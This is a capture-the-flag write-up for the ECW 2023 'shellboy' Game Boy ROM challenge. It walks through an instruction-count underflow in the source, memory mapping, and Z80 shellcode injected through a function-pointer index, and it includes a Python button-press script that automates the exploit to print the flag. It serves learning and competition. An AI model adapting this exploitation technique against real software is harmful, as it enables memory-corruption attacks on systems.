shellboy (Game Boy Pwn)
This is a challenge from the ECW 2023.
We are provided with a Game Boy ROM, its sources and a web emulator that can be controlled with a python script (neat).
The goal of the game is to move a character to a flag inside a maze by given it a list of instructions and the number of times each instruction must be repeated. Of course, because it is a CTF challenge, the game cannot be won by playing by the rules: the flag to reach is surrounded by walls.

Game Control:
Add an instruction
Press the A key to add an instruction, then press any directional key. This will add the instruction to the instruction list. You can add up to 16 instructions.
Repeat an instruction
Press the UP or DOWN arrow to indicate how many times the selected instruction should be repeated.
Navigate in the instruction list
Press the LEFT or RIGHT arrow to move the selection cursor through the instruction list.
Delete an instruction
Position the cursor on the instruction to be deleted, then press B. The instruction will be removed.
Move / Merge two instructions
Position the cursor on the instruction to be moved, then press SELECT. Move the cursor to the desired position and press SELECT again. If the two selected instructions are identical, they will be merged. Otherwise, their positions will be switched.
Launch ShellBoy !
Press START to tell ShellBoy to follow your instructions.
The Vulnerability
I started by playing the game a little. Unsurprisingly, no way to win, but I noticed something strange with the move/merge option: when merging an instruction with itself (by pressing SELECT two times), the instruction is removed, and the cursor that select the instruction stay at the same position. Better, we can still change the count value of the now non existing instruction. However, we can only move the cursor to the left, in the direction of the remaining instruction.

A this point my inner chaos monkey just kept pressing the SELECT button until the was no more instruction in the list. Then I did it again, and surprise! Now the list is full of arrow and we can move the cursor to the right again!

Ok, time to look at the code. The control of the instruction list is defined in inst_list.c. The one function call that interest us is move_inst(inst_cursor_pos, selected_index):
void move_inst(uint8_t inst1_index, uint8_t inst2_index)
{
uint8_t inst1_id = inst_ids[inst1_index];
uint8_t inst2_id = inst_ids[inst2_index];
...
if(inst1_id == inst2_id)
{
uint16_t rpt_sum = inst1_rpt + inst2_rpt;
if(rpt_sum > 255)
...
else
{
...
remove_inst(inst2_index);
}
}
else
...
}
We can see that when merging two stack, the second one is delete if the sum is small enough, even when the two stacks are in fact the same!
void remove_inst(uint8_t inst_index)
{
...
inst_count--;
}
...
else if(KEY_TRIGGERED(J_B) && !list_empty)
{
remove_inst(inst_cursor_pos);
list_empty = inst_count == 0;
inst_cursor_pos = 0;
}
We can notice that remove_inst decrement inst_count, without checks, and do not touch inst_cursor_pos nor list_empty, instead, those are updated when pressing the button B, after calling remove_inst. This is not done in move_inst after calling remove_inst.
Here is the explanation of the strange behaviour: remove_inst do not update inst_count nor list_empty, and move_inst assumes there are at least two instructions in the list, which is false: they can be one, or even zero instructions, so inst_count can underflow, while list_empty stay false and inst_cursor_pos can stay out of bound.
How can we use that? Let’s take a look at the other action the user can do:
...
if(KEY_TRIGGERED(J_LEFT))
{
inst_cursor_pos -= (inst_cursor_pos > 0) ? 1 : 0;
}
// Select next instruction
else if(KEY_TRIGGERED(J_RIGHT))
{
inst_cursor_pos += (inst_cursor_pos < inst_count - 1) ? 1 : 0;
}
// Increase instruction repetition
else if(KEY_TRIGGERED(J_UP) && !list_empty)
{
inst_rpt[inst_cursor_pos] += (inst_rpt[inst_cursor_pos] < 255) ? 1 : 2;
}
// Decrease instruction repetition
else if(KEY_TRIGGERED(J_DOWN) && !list_empty)
{
inst_rpt[inst_cursor_pos] -= (inst_rpt[inst_cursor_pos] > 1) ? 1 : 2;
}
...
We can move the cursor between 0 and inst_count, and set the value of inst_rpt[inst_cursor_pos] from 1 to 255.
(There is also a mode to enter new instruction, but inst_count is checked against MAX_INST so it not really useful)
At this point we need to find out the memory mapping of the variable. I used Sameboy, a emulator/debugger for Game Boy, to dump the memory after setting inst_rpt to a recognisable value (by playing the game):
$ sameboy shellboy.gb > dump.mem
SameBoy v0.15.8
x/65535 $0000
$ grep -A 1 -B 1 '01 02 03 04' dump.mem
c0a0: 01 00 00 ea 03 9c 00 00 00 00 00 00 00 00 00 00
c0b0: 00 0e 02 07 02 14 02 00 02 01 02 03 04 05 06 07
c0c0: 08 09 0a 0b 0c 0d 0e 0f 00 00 00 00 00 00 00 00
I found that inst_rpt starts at 0xc0b9, and from here, by combining watch points, backtraces, the disassembled values in memory (cf Samboy documentation), the source code and a good amount of time and effort, I mapped a few value in memory:
| address | value | symbol |
|---|---|---|
| 0xC0B1 | 0x0e | inst_funcs |
| 0xC0B2 | 0x02 | |
| 0xC0B3 | 0x07 | |
| 0xC0B4 | 0x02 | |
| 0xC0B5 | 0x14 | |
| 0xC0B6 | 0x02 | |
| 0xC0B7 | 0x00 | |
| 0xC0B8 | 0x02 | |
| 0xC0B9 | – | inst_rpt |
| 0xC0BA | – | |
| 0xC0BB | – | |
| 0xC0BC | – | |
| 0xC0BD | – | |
| 0xC0BE | – | |
| 0xC0BF | – | |
| 0xC0C0 | – | |
| 0xC0C1 | – | |
| 0xC0C2 | – | |
| 0xC0C3 | – | |
| 0xC0C4 | – | |
| 0xC0C5 | – | |
| 0xC0C6 | – | |
| 0xC0C7 | – | |
| 0xC0C8 | – | |
| 0xC0C9 | – | inst_ids |
| 0xC0CA | – | |
| 0xC0CB | – | |
| 0xC0CC | – | |
| 0xC0CD | – | |
| 0xC0CE | – | |
| 0xC0CF | – | |
| 0xC0D0 | – | |
| 0xC0D1 | – | |
| 0xC0D2 | – | |
| 0xC0D3 | – | |
| 0xC0D4 | – | |
| 0xC0D5 | – | |
| 0xC0D6 | – | |
| 0xC0D7 | – | |
| 0xC0D8 | – | |
| 0xC0D9 | 0xFF | inst_count |
| 0xC0DA | 0xXX | inst_cursor_pos |
| 0xC0DB | 0x00 | selected_index |
| 0xC0DC | 0x00 | listen_new_inst |
| 0xC0DD | 0x00 | is_moving_inst |
| 0xC0DE | 0x00 | list_empty |
| 0xC0DF | ? | |
| 0xC0E0 | ? | |
| 0xC0E1 | 0x01 | bot_x |
| 0xC0E2 | 0x01 | bot_y |
I also noted the code that display the victory message and then loop, could be useful:
0e8d: LD de, $0ed9
0e90: PUSH de
0e91: LD hl, $1204
0e94: PUSH hl
0e95: LD a, $01
0e97: PUSH af
0e98: INC sp
0e99: CALL $10c0
0e9c: ADD SP, $05
0e9e: LD de, $0064
0ea1: CALL $139b
0ea4: JR $0e9e
Interesting, bot_x and bot_y are after inst_rpt and not to far away. This means we can change the values of the bot ourself. Before pressing start, we have to put back inst_count to a reasonable value, else the game crashes (we will see why later). Pression SELECT many time will do that.

Arbitrary Code Execution
We beat the game! But still no flag. Sad. Instead, we have the address of the flag in memory, in a location way too far from the region we control.
We saw previously that this code is run when we win:
0e8d: LD de, $0ed9
0e90: PUSH de
0e91: LD hl, $1204
0e94: PUSH hl
0e95: LD a, $01
0e97: PUSH af
0e98: INC sp
0e99: CALL $10c0
0e9c: ADD SP, $05
0e9e: LD de, $0064
0ea1: CALL $139b
0ea4: JR $0e9e
Notice CALL $10C0, this is the function that display the text whose address is stored in the register DE (here, 0x0ED9). It would be nice if we could change the 0x0ED9 to 0x06FA in the code, by the location (0x0E8D) is still to far away, and anyway, this memory section is mapped from the ROM and is read only. We need more than just overriding variables, we need arbitrary code execution.
We need to find a way to set the value of the program pointer. The stack is around 0xDFE0, so we can’t override the return pointer. However, during the simulation, there is one point where the program call a function whose address is read from a variable:
void simulate()
{
for(uint8_t i = 0; i < inst_count; i++)
{
uint8_t inst_id = inst_ids[i];
uint8_t inst_rp = inst_rpt[i];
for(uint8_t j = 0; j < inst_rp; j++) {
if(inst_funcs[inst_id]()) {
draw_simu();
delay(100);
}
}
}
...
}
We saw that inst_funcs is located at 0xC0B1, juste before inst_rpt, so we cannot override the addresses of the functions inside inst_funcs. Luckily, we don’t need to, because the function to call is selected by inst_id, which is located in inst_ids, juste after inst_rpt. Usually, inst_id is between 0 and 3, but with our first exploit, we can set it to any value, let say, 4. Conveniently, inst_funcs[4] correspond to the values stored at 0xC0B9: the first two octets of inst_rpt.
Earlier, we noticed the game crashed when running the simulation with an inst_count set to 0xFF. This was due to the value of inst_ids[i] being some random value, causing the program counter to jump somewhere in the RAM that probably did not contained any actual code.
So here we are, we can set the program pointer to an arbitrary value, we control a space in memory, we can write our code in memory and jump in it. I had to refresh my Z80 a little to write my payload, mostly because I only had 30 octets with an arbitrary value in the middle. (Latter someone pointed out that 0x04 is the instruction INC B, so basically a NOP in our situation, and in another write-up someone juste removed a lot of the code I used by just jumping at 0x0E90 after setting DE. I’m a little stupid, so my solution is more complex than it needs to, but hey, it works).
So here is the state of the memory after we set it:
| address | value | symbol/disassemble |
|---|---|---|
| 0xC0B1 | 0x0e | inst_funcs |
| 0xC0B2 | 0x02 | |
| 0xC0B3 | 0x07 | |
| 0xC0B4 | 0x02 | |
| 0xC0B5 | 0x14 | |
| 0xC0B6 | 0x02 | |
| 0xC0B7 | 0x00 | |
| 0xC0B8 | 0x02 | |
| 0xC0B9 | 0xBB | inst_rpt |
| 0xC0BA | 0xC0 | |
| 0xC0BB | 0x11 | LD DE, $06FA |
| 0xC0BC | 0xFA | |
| 0xC0BD | 0x06 | |
| 0xC0BE | 0xD5 | PUSH DE |
| 0xC0BF | 0x21 | LD HL, $1204 |
| 0xC0C0 | 0x04 | |
| 0xC0C1 | 0x12 | |
| 0xC0C2 | 0xE5 | PUSH HL |
| 0xC0C3 | 0x00 | NOP |
| 0xC0C4 | 0x00 | NOP |
| 0xC0C5 | 0x00 | NOP |
| 0xC0C6 | 0xC3 | JMP $C0CA |
| 0xC0C7 | 0xCA | |
| 0xC0C8 | 0xC0 | |
| 0xC0C9 | 0x04 | inst_ids |
| 0xC0CA | 0x3E | LD A, $01 |
| 0xC0CB | 0x01 | |
| 0xC0CC | 0xF5 | PUSH AF |
| 0xC0CD | 0x33 | INCR SP |
| 0xC0CE | 0xCD | CALL $10C0 |
| 0xC0CF | 0xC0 | |
| 0xC0D0 | 0x10 | |
| 0xC0D1 | 0xC3 | JMP $0E9C |
| 0xC0D2 | 0x9E | |
| 0xC0D3 | 0x0E | |
| 0xC0D4 | – | |
| 0xC0D5 | – | |
| 0xC0D6 | – | |
| 0xC0D7 | – | |
| 0xC0D8 | – | |
| 0xC0D9 | 0xFF | inst_count |
| 0xC0DA | 0x00 | inst_cursor_pos |
| 0xC0DB | 0x00 | selected_index |
| 0xC0DC | 0x00 | listen_new_inst |
| 0xC0DD | 0x00 | is_moving_inst |
| 0xC0DE | 0x00 | list_empty |
| 0xC0DF | ? | |
| 0xC0E0 | ? | |
| 0xC0E1 | 0x01 | bot_x |
| 0xC0E2 | 0x01 | bot_y |
This time no need to set inst_count to a sensible value, the first instruction will trigger our injected code which print the flag before jumping into an infinite loop.

Here is my code to automate the hack:
def win_game():
press_button(BUTTON_A)
press_button(BUTTON_RIGHT_ARROW)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
for _ in range(40):
press_button(BUTTON_RIGHT_ARROW)
for _ in range(5):
press_button(BUTTON_UP_ARROW)
press_button(BUTTON_RIGHT_ARROW)
for _ in range(3):
press_button(BUTTON_UP_ARROW)
for _ in range(41):
press_button(BUTTON_LEFT_ARROW)
for i in range(250):
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_START)
def write_code(code: bytes):
for b in code:
for _ in range(b):
press_button(BUTTON_UP_ARROW)
press_button(BUTTON_RIGHT_ARROW)
for _ in code:
press_button(BUTTON_LEFT_ARROW)
def display_flag():
press_button(BUTTON_A)
press_button(BUTTON_RIGHT_ARROW)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
write_code(
bytes(
[
0xBB,
0xC0,
0x11,
0xFA,
0x06,
0xD5,
0x21,
0x04,
0x12,
0xE5,
0,
0,
0,
0xC3,
0xCA,
0xC0,
0x04,
0x3E,
0x01,
0xF5,
0x33,
0xCD,
0xC0,
0x10,
0xC3,
0x9E,
0x0E,
]
)
)
press_button(BUTTON_START)
display_flag()
Optimizations
For the impatiens ones, I was sent by 0xskav an optimized version of write_code:
def write_code(code: bytes):
for b in code:
a = 255 - b
down = False
if a < b:
down = True
b = a
for _ in range(b):
if(down == False):
press_button(BUTTON_UP_ARROW)
else:
press_button(BUTTON_DOWN_ARROW)
press_button(BUTTON_RIGHT_ARROW)
for _ in code:
press_button(BUTTON_LEFT_ARROW)
And while we are at it with optimizations, we can use the shorter code injection used by !AlphaTartine:
| address | value | symbol/disassemble |
|---|---|---|
| 0xC0BB | 0x11 | LD DE, $06FA |
| 0xC0BC | 0xFA | |
| 0xC0BD | 0x06 | |
| 0xC0BE | 0xC3 | JMP $0E90 |
| 0xC0BF | 0x90 | |
| 0xC0C0 | 0x0E |
def display_flag():
press_button(BUTTON_A)
press_button(BUTTON_RIGHT_ARROW)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
press_button(BUTTON_SELECT)
write_code(
bytes(
[
0xBB,
0xC0,
0x11,
0xFA,
0x06,
0xC3,
0x90,
0x0E,
0,
0,
0,
0,
0,
0,
0,
0,
0x04,
]
)
)
press_button(BUTTON_START)